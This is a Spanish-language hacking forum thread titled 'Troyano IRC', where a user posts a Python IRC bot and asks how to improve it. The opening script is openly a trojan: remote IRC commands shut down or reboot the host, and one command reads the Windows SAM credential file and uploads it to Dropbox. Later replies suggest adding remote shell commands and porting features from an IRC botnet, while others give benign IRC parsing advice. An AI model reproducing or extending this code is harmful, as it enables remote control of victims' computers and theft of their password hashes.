comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Troyano IRC

  • 9 Respuestas
  • 3295 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dolphin

  • *
  • Underc0der
  • Mensajes: 91
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Septiembre 12, 2016, 01:07:06 pm »
Hola hoy he hecho este pequeño script y no se que mas ponerle para que no sea tan cortito
Código: Python
  1. import sys
  2. import time
  3. import socket
  4. import os
  5. import dropbox
  6. import datetime
  7. server=" irc.ejemplo.net"#el servidor irc tullo
  8. botnick="botejemplo"#el nombre dela maquina
  9. channel="#ejeplo"#canal
  10. client = dropbox.client.DropboxClient('Tu token')#Tu token para subirlo a dropbox(si quieres)
  11. suffix = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
  12. p = "sam"+suffix+".bin"
  13. irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  14. irc.connect((server,6667))
  15. irc.setblocking(False)
  16. time.sleep(1)
  17. irc.send("USER "+botnick+" "+botnick+" "+botnick+" :Hola soy un bot!\r\n")
  18. time.sleep(1)
  19. irc.send("NICK "+botnick+"\n")
  20. time.sleep(1)
  21. irc.send("JOIN "+channel+"\n")
  22.  
  23. while 1:
  24.      time.sleep(0.1)
  25.      try:
  26.           text=irc.recv(2040)
  27.           print(text)
  28.      except Exception:
  29.           pass
  30.      if text.find("PING")!=-1:
  31.           irc.send("PONG "+text.split()[1]+"\r\n")
  32.      if text.lower().find(":@apaga")!=-1:
  33.           os.system('shutdown -P')#para apagar la pc
  34.      if text.lower().find(":@reinicia")!=-1:
  35.           os.system('shutdown -r')#para reiniciarla
  36.       if text.lower().find(":@passthehash")!=-1:
  37.            f = open ('C:\Windows\system32\config\sam')#para abrir sam
  38.            client.put_file(p, f)#para subirlo a dropbox
  39.                  
  40.      text=""
  41. input()
  42.  
que mas le  puedo poner y solucionar para que sea mejor? ;) ;)

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Septiembre 12, 2016, 02:02:50 pm »
Muy buen trabajo bro! Yo creo que @No tienes permisos para ver links. Registrate o Entra con tu cuenta es el indicado para mencionarte que mejorarle!

Saludos,
ANTRAX


Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #2 en: Septiembre 12, 2016, 08:33:03 pm »
En general, un bot de irc responde a necesidades de los usuarios de un canal

Por ejemplo, si pasan muchos links capaz queres que muestre el titulo de la pagina
En un canal jugabamos a un juego en el que un usuario pasaba el link a dos articulos de wikipedia y habia que buscar la forma de llegar de uno al otro clickeando en la menor cantidad de links posibles. Habia un bot que verificaba que los resultados sean correctos y contaba los links
Si es por practicar, fijate cosas que hace otro bot. Te dejo uno que hice hace tiempo No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hola,tengo una duda:

Cómo podría coger lo que el usuario escribe en un chat irc, y printearlo en el chat con un bot irc hecho en python con la librería socket?? :'(
en tu codigo, al mensaje lo tenes en la variable text
hacele un print a eso para ver que tiene y ahi fijate como extraer la parte que te interesa
para mandar algo a un canal tenes que usar privmsg
Creo que es asi: "PRIVMSG #canal: mensaje"

Desconectado dolphin

  • *
  • Underc0der
  • Mensajes: 91
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Septiembre 13, 2016, 08:03:39 am »
grax  ;),ya lo solucione lo unico que tenia que hacer es hacer un .replace:
Código: Python
  1. if text.find("ola")!=-1:
  2.           mi_texto=text.replace(":dolphin_!577db627@gateway/web/freenode/ip.MI_IP_PUBLICA PRIVMSG ##hola :", "")    
  3.           irc.send("PRIVMSG "+channel+" :"+mi_texto+"\r\n")
« Última modificación: Septiembre 13, 2016, 08:29:04 am por BadB0y_4 »

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #4 en: Septiembre 13, 2016, 10:10:14 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
grax  ;),ya lo solucione lo unico que tenia que hacer es hacer un .replace:
Código: Python
  1. if text.find("ola")!=-1:
  2.           mi_texto=text.replace(":dolphin_!577db627@gateway/web/freenode/ip.MI_IP_PUBLICA PRIVMSG ##hola :", "")    
  3.           irc.send("PRIVMSG "+channel+" :"+mi_texto+"\r\n")
y si cambia esta parte? dolphin_!577db627
y si cambia la ip?
no uses replace, usa split

Desconectado dolphin

  • *
  • Underc0der
  • Mensajes: 91
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Septiembre 14, 2016, 10:41:50 am »
tienes razon,va de maravilla,gracias
Código: Python
  1.  if text.find("prueba")!=-1:
  2.           mi_texto=text.split('prueba')
  3.           irc.send("PRIVMSG "+channel+" :"+mi_texto[1]+"\r\n")

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #6 en: Septiembre 14, 2016, 11:57:27 am »
Mira como hacen aca No tienes permisos para ver links. Registrate o Entra con tu cuenta

La idea es cortar el string en ":" y " ", que es lo que usa el protocolo para separar campos. De esa forma, si queres seguir ampliando el bot va a ser mucho mas facil

Desconectado dreadpixel

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Marzo 12, 2017, 11:51:52 pm »
Para hacerlo realmente un troyano debes agregar funciones que puedan operar el sistema operativo que se esta siendo usado.
Puedes poner que mande comandos a la consola dependiendo que OS tenga. Y hacer poder de prueba ls o dir.



Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #8 en: Marzo 13, 2017, 09:55:13 pm »
parece que nunca me di cuenta de que estabamos hablando de un troyano, yo le hablaba como si fuera un bot comun

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« Respuesta #9 en: Marzo 17, 2017, 06:23:29 pm »
Si se trata de un troyano IRC y buscas ideas entonces revista la lista de funciones de mi IRC Botnet en Delphi : No tienes permisos para ver links. Registrate o Entra con tu cuenta , tu trabajo seria traducir a Python las funciones que te gustan del proyecto.

Saludos.

 

¿Te gustó el post? COMPARTILO!